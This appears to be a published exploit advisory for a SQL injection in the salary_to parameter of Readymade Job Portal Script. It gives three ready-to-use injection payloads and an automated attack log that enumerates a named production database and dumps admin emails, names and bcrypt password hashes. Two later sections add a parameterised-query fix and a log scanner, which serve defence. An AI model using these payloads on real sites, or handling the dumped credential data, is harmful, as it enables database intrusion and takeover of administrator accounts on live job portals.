Authored by CraCkEr

Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.

CraCkEr
THE CRACK OF ETERNAL MIGHT

From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : i-netsolution.com
Vendor    : i-Net Solution
Software  : Readymade Job Portal Script
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Job Portal is a website that serves as a bridge between employers and job seekers.

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets:

Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022


GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---
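
The shape of the boolean payload above (a closing parenthesis right after 333 and a dangling `(4873=4873` at the end) implies that `salary_to` is concatenated unquoted into a parenthesised WHERE clause. The following is an added example, not the vendor's code and not part of the original advisory: a Python/SQLite model of that assumed query shape beside a version that validates both salary fields as integers and binds them as parameters. The table, column and function names are hypothetical.

```python
import sqlite3

# Boolean-based payload for salary_to, copied from the advisory above.
PAYLOAD = "333) AND 3040=3040 AND (4873=4873"

def make_db():
    """Constructed sample data; the product's real schema is not shown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, salary INTEGER)")
    db.executemany("INSERT INTO jobs (title, salary) VALUES (?, ?)",
                   [("Clerk", 250), ("Analyst", 300), ("Director", 9000)])
    return db

def search_vulnerable(db, salary_from, salary_to):
    # Assumed flaw: request strings concatenated into a parenthesised filter.
    sql = ("SELECT title FROM jobs WHERE (salary >= " + salary_from +
           " AND salary <= " + salary_to + ") ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def parse_salary(raw, default):
    """Accept only a short run of ASCII digits; empty means 'no bound'."""
    raw = raw.strip()
    if raw == "":
        return default
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("salary filter must be a whole number")
    return int(raw)

def search_hardened(db, salary_from, salary_to):
    lo = parse_salary(salary_from, 0)
    hi = parse_salary(salary_to, 10**9)
    # Placeholders keep the values out of the SQL text entirely.
    sql = "SELECT title FROM jobs WHERE (salary >= ? AND salary <= ?) ORDER BY id"
    return [row[0] for row in db.execute(sql, (lo, hi))]

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "222", PAYLOAD))   # payload is parsed as SQL
    try:
        search_hardened(db, "222", PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

In the concatenating version the payload closes the filter cleanly and the statement runs as if it were a normal search, which is what lets the appended conditions act as an oracle. The hardened version rejects the value before any SQL is built.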

[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)


[INFO] fetching current database
current database: 'theminsall_jobportal_db'


[INFO] fetching tables for database: 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets |
| admins |
| applicant_messages |
| blog_categories |
| blogs |
| career_levels |
| cities |
| cms |
| cms_content |
| companies |
| company_messages |
| company_password_resets |
| contact_messages |
| countries |
| countries_details |
| degree_levels |
| degree_types |
| failed_jobs |
| faqs |
| favourite_applicants |
| favourites_company |
| favourites_job |
| functional_areas |
| genders |
| industries |
| job_alerts |
| job_apply |
| job_apply_rejected |
| job_experiences |
| job_shifts |
| job_skills |
| job_titles |
| job_types |
| jobs |
| language_levels |
| languages |
| major_subjects |
| manage_job_skills |
| marital_statuses |
| migrations |
| ownership_types |
| packages |
| password_resets |
| payu_transactions |
| profile_cvs |
| profile_education_major_subjects |
| profile_educations |
| profile_experiences |
| profile_languages |
| profile_projects |
| profile_skills |
| profile_summaries |
| queue_jobs |
| report_abuse_company_messages |
| report_abuse_messages |
| result_types |
| roles |
| salary_periods |
| send_to_friend_messages |
| seo |
| site_settings |
| sliders |
| states |
| subscriptions |
| testimonials |
| unlocked_users |
| user_messages |
| users |
| videos |
| widget_pages |
| widgets |
| widgets_data |
+----------------------------------+


[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| created_at     | timestamp        |
| email          | varchar(191)     |
| id             | int(10) unsigned |
| name           | varchar(191)     |
| password       | varchar(191)     |
| remember_token | varchar(100)     |
| role_id        | int(11)          |
| updated_at     | timestamp        |
+----------------+------------------+


[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email | password | name |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3 | [email protected] | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |
| 4 | [email protected] | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5 | [email protected] | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |
+----+--------------------+--------------------------------------------------------------+-----------+
Possible Algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done
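
For operators of this script who want to check whether the parameter has been probed, the following added example (not part of the original advisory) scans web access logs for `salary_from` / `salary_to` values that are not plain integers and labels the ones matching the time-based and error-based techniques listed above. The log lines, the `/search` path and the client addresses are constructed for illustration; the advisory does not name the endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qs

NUMERIC_PARAMS = ("salary_from", "salary_to")
# Common/combined log format: client, two fields, [time], "METHOD target proto"
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample log (documentation IP ranges, hypothetical /search path).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2022:13:55:36 +0000] "GET /search?search=&salary_from=222&salary_to=333 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2022:13:56:01 +0000] "GET /search?search=&salary_from=222&salary_to=333%29%20AND%203040%3D3040%20AND%20%284873%3D4873 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2022:13:56:20 +0000] "GET /search?search=&salary_from=222&salary_to=333%29%20AND%20%28SELECT%205992%20FROM%20%28SELECT%28SLEEP%2810%29%29%29wrGn%29%20AND%20%288437%3D8437 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2022:13:57:02 +0000] "GET /search?search=dev&salary_from=&salary_to= HTTP/1.1" 200 4800',
]

def classify(value):
    """Label a non-numeric value using markers from the advisory's payloads."""
    v = value.lower()
    if "sleep(" in v:
        return "time-based"
    if "floor(rand(" in v or "information_schema" in v:
        return "error-based"
    return "non-numeric"

def scan(lines):
    """Return (client, parameter, label) for each suspicious salary value."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are seen in clear
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if value and not (value.isascii() and value.isdigit()):
                    hits.append((client, name, classify(value)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because these fields are numeric by design, any non-digit value is worth reviewing even when it matches none of the labelled markers.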